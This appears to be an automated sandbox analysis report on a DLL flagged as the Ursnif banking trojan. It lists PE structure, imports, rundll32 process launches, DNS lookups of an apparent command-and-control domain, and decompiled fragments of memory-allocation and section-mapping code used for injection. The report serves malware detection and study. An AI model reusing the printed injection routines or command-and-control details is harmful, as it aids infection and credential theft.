cmp dword ptr [ebp+0Ch], 01h
je 00007FD20CC24F48h
cmp dword ptr [ebp+0Ch], 02h
jne 00007FD20CC24F96h
cmp dword ptr [0106B584h], 00000000h
je 00007FD20CC24F57h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call dword ptr [0106B584h]
mov dword ptr [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 00000000h
je 00007FD20CC24F56h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007FD20CC24B4Dh

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x72270	0x96	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x71748	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8a000	0xf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8b000	0x2144	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x54240	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x70ae0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x54000	0x1e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5276f	0x53000	False	0.69192100433	data	6.60509734731	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x54000	0x1e306	0x1f000	False	0.611036731351	data	5.73468988943	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x73000	0x16c28	0x2000	False	0.149047851562	data	1.80021341356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x8a000	0xf8	0x1000	False	0.04541015625	data	0.443235452886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8b000	0x44bc	0x5000	False	0.34267578125	data	3.71306442845	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x8a060	0x91	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateFileA, CloseHandle, SetFilePointer, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, LoadLibraryA, GetStringTypeW, GetStringTypeA, GetLocaleInfoA, LoadLibraryW, OutputDebugStringW, WriteConsoleW, OutputDebugStringA, DebugBreak, GetConsoleMode, GetConsoleCP, FlushFileBuffers, WriteFile, GetSystemDirectoryA, GetCurrentDirectoryA, GetModuleFileNameA, GetEnvironmentVariableA, VirtualProtectEx, TlsAlloc, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, RaiseException, HeapValidate, IsBadReadPtr, RtlUnwind, GetCurrentThreadId, GetCommandLineA, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameW, FatalAppExitA, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, WideCharToMultiByte, MultiByteToWideChar, LCMapStringA, GetLastError, LCMapStringW, GetACP, GetOEMCP, GetCPInfo, GetProcAddress, GetModuleHandleA, TlsGetValue, TlsSetValue, TlsFree, SetLastError, HeapReAlloc, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime
USER32.dll	FillRect, TrackPopupMenu, DrawFrameControl, PostMessageA, IsDialogMessageA, GetActiveWindow, AppendMenuA, MapWindowPoints, GetSystemMetrics, DestroyMenu, BeginPaint, InvalidateRect, ValidateRect, SetWindowLongA
RPCRT4.dll	RpcRaiseException, RpcStringFreeA, RpcServerListen, RpcMgmtSetServerStackSize, I_RpcBindingIsClientLocal, UuidFromStringA, UuidCreate, RpcImpersonateClient, RpcRevertToSelf, NdrServerCall2
Secur32.dll	FreeContextBuffer, DeleteSecurityContext, QueryContextAttributesA, InitializeSecurityContextA, QuerySecurityPackageInfoA
COMCTL32.dll	ImageList_SetOverlayImage, DestroyPropertySheetPage, ImageList_Add, CreateToolbarEx, ImageList_Destroy, PropertySheetA

Exports

Name	Ordinal	Address
Childrenwin	1	0x1037030
Did	2	0x1036f50
Egggun	3	0x1037f40
Instantprepare	4	0x1036b60
Otherdesign	5	0x1037130

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 9, 2021 16:06:57.352068901 CEST	50620	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:06:57.365098953 CEST	53	50620	8.8.8.8	192.168.2.3
Jul 9, 2021 16:06:57.371787071 CEST	64938	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:06:57.384784937 CEST	53	64938	8.8.8.8	192.168.2.3
Jul 9, 2021 16:06:58.512778997 CEST	60152	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:06:58.526881933 CEST	53	60152	8.8.8.8	192.168.2.3
Jul 9, 2021 16:06:59.201056004 CEST	57544	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:06:59.214080095 CEST	53	57544	8.8.8.8	192.168.2.3
Jul 9, 2021 16:07:01.694236040 CEST	55984	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:07:01.708488941 CEST	53	55984	8.8.8.8	192.168.2.3
Jul 9, 2021 16:07:02.754949093 CEST	64185	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:07:02.768912077 CEST	53	64185	8.8.8.8	192.168.2.3
Jul 9, 2021 16:07:04.101135015 CEST	65110	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:07:04.116830111 CEST	53	65110	8.8.8.8	192.168.2.3
Jul 9, 2021 16:07:05.044939041 CEST	58361	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:07:05.061602116 CEST	53	58361	8.8.8.8	192.168.2.3
Jul 9, 2021 16:07:05.814675093 CEST	63492	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:07:05.827651024 CEST	53	63492	8.8.8.8	192.168.2.3
Jul 9, 2021 16:07:44.206559896 CEST	60831	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:07:44.269917965 CEST	53	60831	8.8.8.8	192.168.2.3
Jul 9, 2021 16:07:55.629579067 CEST	60100	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:07:55.677076101 CEST	53	60100	8.8.8.8	192.168.2.3
Jul 9, 2021 16:08:33.819577932 CEST	53195	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:08:33.833997965 CEST	53	53195	8.8.8.8	192.168.2.3
Jul 9, 2021 16:08:55.580288887 CEST	50141	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:08:55.596407890 CEST	53	50141	8.8.8.8	192.168.2.3
Jul 9, 2021 16:08:57.205854893 CEST	53023	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:08:57.218764067 CEST	53	53023	8.8.8.8	192.168.2.3
Jul 9, 2021 16:08:58.641016006 CEST	49563	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:08:58.653860092 CEST	53	49563	8.8.8.8	192.168.2.3
Jul 9, 2021 16:08:59.434595108 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:08:59.448905945 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 9, 2021 16:08:59.608179092 CEST	59349	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:08:59.649327993 CEST	53	59349	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:00.080173016 CEST	57084	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:00.115365982 CEST	53	57084	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:00.225277901 CEST	58823	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:00.242109060 CEST	53	58823	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:01.023397923 CEST	57568	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:01.038414955 CEST	53	57568	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:01.775357962 CEST	50540	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:01.787420988 CEST	53	50540	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:02.544472933 CEST	54366	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:02.560201883 CEST	53	54366	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:03.363470078 CEST	53034	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:03.377631903 CEST	53	53034	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:07.669938087 CEST	57762	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:07.691886902 CEST	53	57762	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:09.381865978 CEST	55435	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:09.417860985 CEST	53	55435	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:09.435143948 CEST	50713	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:09.466312885 CEST	53	50713	8.8.8.8	192.168.2.3
Jul 9, 2021 16:09:09.496572018 CEST	56132	53	192.168.2.3	8.8.8.8
Jul 9, 2021 16:09:09.510890007 CEST	53	56132	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 9, 2021 16:09:09.381865978 CEST	192.168.2.3	8.8.8.8	0xfa31	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jul 9, 2021 16:09:09.435143948 CEST	192.168.2.3	8.8.8.8	0x7635	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)
Jul 9, 2021 16:09:09.496572018 CEST	192.168.2.3	8.8.8.8	0xa0c7	Standard query (0)	authd.feronok.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 9, 2021 16:08:59.649327993 CEST	8.8.8.8	192.168.2.3	0x278c	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jul 9, 2021 16:09:09.417860985 CEST	8.8.8.8	192.168.2.3	0xfa31	Name error (3)	authd.feronok.com	none	none	A (IP address)	IN (0x0001)
Jul 9, 2021 16:09:09.466312885 CEST	8.8.8.8	192.168.2.3	0x7635	Name error (3)	authd.feronok.com	none	none	A (IP address)	IN (0x0001)
Jul 9, 2021 16:09:09.510890007 CEST	8.8.8.8	192.168.2.3	0xa0c7	Name error (3)	authd.feronok.com	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5364 Parent PID: 5608

General

Start time:	16:07:04
Start date:	09/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\3d0.dll'
Imagebase:	0x1180000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4948 Parent PID: 5364

General

Start time:	16:07:04
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5544 Parent PID: 5364

General

Start time:	16:07:05
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3d0.dll,Childrenwin
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5312 Parent PID: 4948

General

Start time:	16:07:05
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.471466961.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.471539450.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.484867910.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.471563129.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.471585703.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.471598164.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.471441604.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.471514910.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.471488667.00000000059B8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1288 Parent PID: 5364

General

Start time:	16:07:09
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3d0.dll,Did
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3040 Parent PID: 5364

General

Start time:	16:07:13
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3d0.dll,Egggun
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6036 Parent PID: 5364

General

Start time:	16:07:19
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3d0.dll,Instantprepare
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6132 Parent PID: 5364

General

Start time:	16:07:25
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3d0.dll,Otherdesign
Imagebase:	0xf0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5040 Parent PID: 792

General

Start time:	16:09:06
Start date:	09/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff676450000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4968 Parent PID: 5040

General

Start time:	16:09:07
Start date:	09/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5040 CREDAT:17410 /prefetch:2
Imagebase:	0xb50000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5364 Parent PID: 5608 loaddll32.exeCOMMON

Executed Functions

Function 01154F71, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000941,00003000,00000040,00000941,011549C8), ref: 0115502E
VirtualAlloc.KERNEL32(00000000,00000056,00003000,00000040,01154A2A), ref: 01155065
VirtualAlloc.KERNEL32(00000000,0000C27B,00003000,00000040), ref: 011550C5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011550FB
VirtualProtect.KERNEL32(010E0000,00000000,00000004,01154F50), ref: 01155200
VirtualProtect.KERNEL32(010E0000,00001000,00000004,01154F50), ref: 01155227
VirtualProtect.KERNEL32(00000000,?,00000002,01154F50), ref: 011552F4
VirtualProtect.KERNEL32(00000000,?,00000002,01154F50,?), ref: 0115534A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01155366

Memory Dump Source

Source File: 00000000.00000002.479498286.0000000001154000.00000040.00020000.sdmp, Offset: 01154000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction ID: 69d7b884109e77d82fbaee2619b31636f715e8c2e67d38a7d3607352ffa1781c
Opcode Fuzzy Hash: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction Fuzzy Hash: D9D1AE73500601EFDB59CF1AC9C0B527BA6FF68310B0D6194ED999FB5AE370A850CB62

Uniqueness

Uniqueness Score: -1.00%

Function 010E1144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E010E1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L010E2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10e41d0;
				_push(_t15 + 0x10e505e);
				_push(_t15 + 0x10e5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L010E220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x10e41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x010e1144
0x010e114d
0x010e1151
0x010e1157
0x010e115c
0x010e1161
0x010e1164
0x010e1167
0x010e116c
0x010e116d
0x010e1170
0x010e117b
0x010e1182
0x010e1186
0x010e1188
0x010e1189
0x010e118c
0x010e1191
0x010e119b
0x010e119d
0x010e119d
0x010e11b1
0x010e11b7
0x010e11bb
0x010e120b
0x010e11bd
0x010e11c6
0x010e11dc
0x010e11e4
0x010e11f6
0x010e11fa
0x00000000
0x00000000
0x010e11e6
0x010e11e9
0x010e11ee
0x010e11f0
0x010e11f0
0x010e11d1
0x010e11d3
0x010e11fc
0x010e11fd
0x010e11fd
0x010e11c6
0x010e1213

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,010E156A,0000000A,?,?), ref: 010E1151
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010E1167
_snwprintf.NTDLL ref: 010E118C
CreateFileMappingW.KERNELBASE(000000FF,010E41C0,00000004,00000000,?,?), ref: 010E11B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,010E156A,0000000A,?), ref: 010E11C8
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 010E11DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,010E156A,0000000A,?), ref: 010E11F4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,010E156A,0000000A), ref: 010E11FD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,010E156A,0000000A,?), ref: 010E1205

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 053c57360b7bae7bafc2bfdb046fc6f362a0c576f8fadaacc0de0782bfdff85d
Instruction ID: 2955d2c116fbe47a9e99436886e8dab01f8e398e88413f9518f23e400722ef4c
Opcode Fuzzy Hash: 053c57360b7bae7bafc2bfdb046fc6f362a0c576f8fadaacc0de0782bfdff85d
Instruction Fuzzy Hash: 4121D3B2600108BFDB20AF9ADC88EDE7FE8FB48351F1041A9F691DB140D6359904CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01115A90, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1084COMMON

Download Yara Rule

Strings

I#, xrefs: 0111647A
#, xrefs: 01116649

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID:
String ID: #$I#
API String ID: 0-3815891943
Opcode ID: 2415ad63d1f6790a8f49122c38ad10b976f1012611b9f0b24767eec39216360b
Instruction ID: 16a75ac7d188029d40722530750cdb45c5f66220dff4169ca667939a8988cb9e
Opcode Fuzzy Hash: 2415ad63d1f6790a8f49122c38ad10b976f1012611b9f0b24767eec39216360b
Instruction Fuzzy Hash: 95A2CA72924351CFC77DCF28E990269FBB2B784394B05413ED8748725DE3719A8ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 010E1B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E010E1B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E010E1EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x010e1ba5
0x010e1bac
0x010e1bad
0x010e1bae
0x010e1baf
0x010e1bb0
0x010e1bc1
0x010e1bc5
0x010e1bd9
0x010e1bdc
0x010e1bdf
0x010e1be6
0x010e1be9
0x010e1bf0
0x010e1bf3
0x010e1bf6
0x010e1bf9
0x010e1bfe
0x010e1c39
0x010e1c00
0x010e1c03
0x010e1c09
0x010e1c0e
0x010e1c12
0x010e1c30
0x010e1c14
0x010e1c1b
0x010e1c29
0x010e1c29
0x010e1c12
0x010e1c41

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 010E1BF9

Part of subcall function 010E1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,010E1C0E,00000002,00000000,?,?,00000000,?,?,010E1C0E,00000000), ref: 010E1EF4

memset.NTDLL ref: 010E1C1B

Strings

@, xrefs: 010E1BE9

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction ID: 3ba46ffc4d2cd65e544b862dfcb93dd8e0ae5eee67f2f49e00970c88b2284f6e
Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction Fuzzy Hash: AE210BB1D0020DAFCB11DFA9C8849EEFBF9FB48354F108869E655F3210D7359A458B64

Uniqueness

Uniqueness Score: -1.00%

Function 010E1E8A, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E010E1E8A(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x010e1e8e
0x010e1e9f
0x010e1ea7
0x010e1ea9
0x010e1ebc
0x010e1ebc
0x010e1ec6

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,010E1B27,?,010E1CE6,?,00000000,00000000,?,?,?,010E1CE6), ref: 010E1E9F
GetSystemDefaultUILanguage.KERNEL32(?,?,010E1B27,?,010E1CE6,?,00000000,00000000,?,?,?,010E1CE6), ref: 010E1EA9
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,010E1B27,?,010E1CE6,?,00000000,00000000,?,?,?,010E1CE6), ref: 010E1EBC

Memory Dump Source
